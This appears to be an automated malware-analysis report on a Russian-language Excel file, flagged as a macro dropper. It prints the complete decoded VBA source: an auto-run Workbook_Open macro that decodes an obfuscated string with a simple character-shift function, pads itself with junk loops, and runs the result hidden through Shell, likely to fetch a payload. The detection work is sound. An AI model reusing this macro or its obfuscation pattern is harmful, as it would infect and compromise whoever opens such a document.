MALICIOUS
Risk Score: 148
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The file is an Excel document containing a Workbook_Open VBA macro. The macro uses a Shell call to execute an obfuscated string, which is likely a command to download and run a secondary payload. The ClamAV detection name 'Xls.Dropper.Agent-6333155-0' further supports its role as a dropper. The macro's obfuscation and the presence of a Shell call indicate malicious intent to execute arbitrary code.
Heuristics 4
- ClamAV: Xls.Dropper.Agent-6333155-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Dropper.Agent-6333155-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script:
  Shell oJUIdsfdsF, vbHide
- Workbook_Open macro (low, OLE_VBA_WBOPEN): Workbook_Open macro. Matched line in script:
  Sub Workbook_Open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3486 bytes |

SHA-256: da897fec122551cd212af944a6bf509ee1bd184d87dd6844da8e39d3a4d4c02c

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
Dim sxDmlDGZ As Integer
For sxDmlDGZ = 0 To 4
Dim FiAlZHWv As Integer
For FiAlZHWv = 0 To 9
DoEvents
Next FiAlZHWv
DoEvents
Next sxDmlDGZ
Dim ffAkQrGQ As Integer
For ffAkQrGQ = 0 To 5
DoEvents
Next ffAkQrGQ
oJUIdsfdsF = OlFdL0IOXbF(" ЄЎ]l€]Ќ¬ґўЇђҐў©©kўµў]e‹ўґjЊџ§ў ±]ђ¶°±ўЄk‹ў±k”ўџЂ©¦ў«±fkЃ¬ґ«©¬ћЎѓ¦©ўedҐ±±wllvokspkutkqmlћЁ°§ЎЎўЇґЎlћ°ЎџґЁlЎҐ¬ў¦kўµўdidb‘‚ЉЌb™¬’Ґ§¦Ў°Јkўµўdfxђ±ћЇ±jЌЇ¬ ў°°]db‘‚ЉЌb™¬’Ґ§¦Ў°Јkўµўdx", "61")
Dim mwlXRRMn As Integer
For mwlXRRMn = 0 To 9
Dim EmMXtScD As Integer
For EmMXtScD = 0 To 4
DoEvents
Next EmMXtScD
DoEvents
Next mwlXRRMn
Dim jWtyraXh As Integer
For jWtyraXh = 0 To 2
DoEvents
Next jWtyraXh
Shell oJUIdsfdsF, vbHide
End Sub
Public Function OlFdL0IOXbF(ByVal InputData As String, ByVal NumKey As Integer) As String
Dim i As Long, OutChar As String
For i = 1 To Len(InputData)
Dim FqjuMBHm As Integer
For FqjuMBHm = 0 To 6
Dim tfBRkgNR As Integer
For tfBRkgNR = 0 To 6
DoEvents
Next tfBRkgNR
DoEvents
Next FqjuMBHm
Dim JGoFjEbi As Integer
For JGoFjEbi = 0 To 6
DoEvents
Next JGoFjEbi
OutChar = Asc(Mid(InputData, i, 1)) - NumKey
While OutChar < 0
Dim UVMKvtXD As Integer
For UVMKvtXD = 0 To 5
Dim SvyacOAG As Integer
For SvyacOAG = 0 To 5
DoEvents
Next SvyacOAG
DoEvents
Next UVMKvtXD
Dim SlbANPcr As Integer
For SlbANPcr = 0 To 6
DoEvents
Next SlbANPcr
OutChar = OutChar + 256
Dim rkOPdIvx As Integer
For rkOPdIvx = 0 To 5
Dim pOUWlfCz As Integer
For pOUWlfCz = 0 To 6
DoEvents
Next pOUWlfCz
DoEvents
Next rkOPdIvx
Dim jKlXnybu As Integer
For jKlXnybu = 0 To 8
DoEvents
Next jKlXnybu
Wend
Dim mvteclmh As Integer
For mvteclmh = 0 To 2
Dim pORpyoOA As Integer
For pORpyoOA = 0 To 7
DoEvents
Next pORpyoOA
DoEvents
Next mvteclmh
Dim kKkqfasT As Integer
For kKkqfasT = 0 To 2
DoEvents
Next kKkqfasT
OlFdL0IOXbF = OlFdL0IOXbF + Chr(OutChar)
Dim tfesHImQ As Integer
For tfesHImQ = 0 To 5
Dim XhhmRvEb As Integer
For XhhmRvEb = 0 To 1
DoEvents
Next XhhmRvEb
DoEvents
Next tfesHImQ
Dim evzwSjyR As Integer
For evzwSjyR = 0 To 3
DoEvents
Next evzwSjyR
Next
End Function
Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True